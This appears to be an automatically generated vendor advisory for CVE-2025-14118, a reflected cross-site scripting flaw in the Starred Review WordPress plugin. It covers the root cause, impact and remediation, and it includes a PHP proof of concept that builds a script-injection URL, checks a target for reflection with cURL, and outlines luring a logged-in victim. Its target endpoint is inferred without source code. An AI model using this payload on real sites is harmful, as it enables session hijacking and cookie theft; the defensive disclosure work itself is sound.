Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14118: Starred Review <= 1.4.2 – Reflected Cross-Site Scripting via PHP_SELF Variable (starred-review)

CVE ID CVE-2025-14118
Plugin starred-review
Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 1.4.2
Patched Version
Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14118 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Starred Review WordPress plugin, affecting all versions up to and including 1.4.2. The issue resides in the plugin’s insufficient neutralization of the PHP_SELF variable. Attackers can inject arbitrary JavaScript into pages, which executes in the victim’s browser context. The CVSS score of 6.1 indicates a medium-severity risk, primarily due to the required user interaction and the scope change to the victim’s browser session.

Atomic Edge research infers the root cause is improper sanitization and output escaping. The vulnerability description explicitly cites the PHP_SELF variable. In WordPress plugins, PHP_SELF is a PHP superglobal that contains the path of the currently executing script. The plugin likely echoes this variable directly into HTML output without proper escaping. This is a classic CWE-79 pattern where user-controllable input reaches output generation functions like echo or print. The conclusion that the variable is echoed unsafely is inferred from the CWE and description, as no source code is available for confirmation.

Exploitation requires an unauthenticated attacker to craft a malicious link containing a JavaScript payload within the PHP_SELF parameter or a related variable. The victim must click this link while authenticated to WordPress. The exact endpoint is not specified, but a common pattern is a plugin administrative page that uses PHP_SELF in form actions or for constructing URLs. A likely target is a file within the plugin’s directory, such as /wp-content/plugins/starred-review/admin/settings.php. The payload would be delivered via a GET request, with the script injected into the server’s response and executed in the victim’s browser.

Remediation requires implementing proper output escaping. The plugin must stop directly outputting the PHP_SELF variable. WordPress provides esc_url() or esc_url_raw() for URL contexts, and esc_attr() for HTML attribute contexts. The fix should validate that any user-influenced data, including server variables, is treated as untrusted and escaped before being rendered in HTML. Input sanitization is also recommended, but output escaping is the primary defense for this XSS vector.

Successful exploitation leads to arbitrary JavaScript execution within the context of the victim’s browser session on the WordPress site. This can result in session hijacking, actions performed on behalf of the user, or theft of sensitive information like cookies and nonces. The impact is limited to the capabilities of the victim user. An admin victim could enable full site compromise. The CVSS metrics confirm low confidentiality and integrity impact with no direct availability effect, but the scope change indicates the attack affects the user’s interaction with the site.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14118 - Starred Review <= 1.4.2 - Reflected Cross-Site Scripting via PHP_SELF Variable
<?php
/**
 * Proof of Concept for CVE-2025-14118.
 * This script demonstrates a reflected XSS attack via the PHP_SELF variable.
 * The exact vulnerable endpoint is inferred; common patterns point to a plugin admin page.
 * The payload triggers a JavaScript alert in the victim's browser.
 */

$target_url = 'https://victim-site.com/wp-content/plugins/starred-review/admin/settings.php';

// Malicious payload to inject. The PHP_SELF variable is often used in form 'action' attributes.
// We append a query string with the XSS payload.
$payload = '"><script>alert(document.domain)</script>';
$exploit_url = $target_url . $payload;

// Display the malicious link for social engineering.
echo "Exploit URL: " . htmlspecialchars($exploit_url) . "n";
echo "nInstructions:";
echo "n1. An attacker would craft this URL with a more stealthy payload.";
echo "n2. The attacker tricks an authenticated WordPress user into clicking the link.";
echo "n3. The victim's browser executes the script when the plugin page loads.";
echo "n4. This PoC uses an alert for demonstration; real attacks would exfiltrate cookies or perform actions.";

// Optional: Use cURL to fetch the page and check if the payload is reflected (unencoded).
echo "nn[Optional] Checking for reflection...n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, $payload) !== false) {
    echo "Payload found reflected in response (likely vulnerable).n";
} else {
    echo "Payload not found in raw response. The endpoint may be different or patched.n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School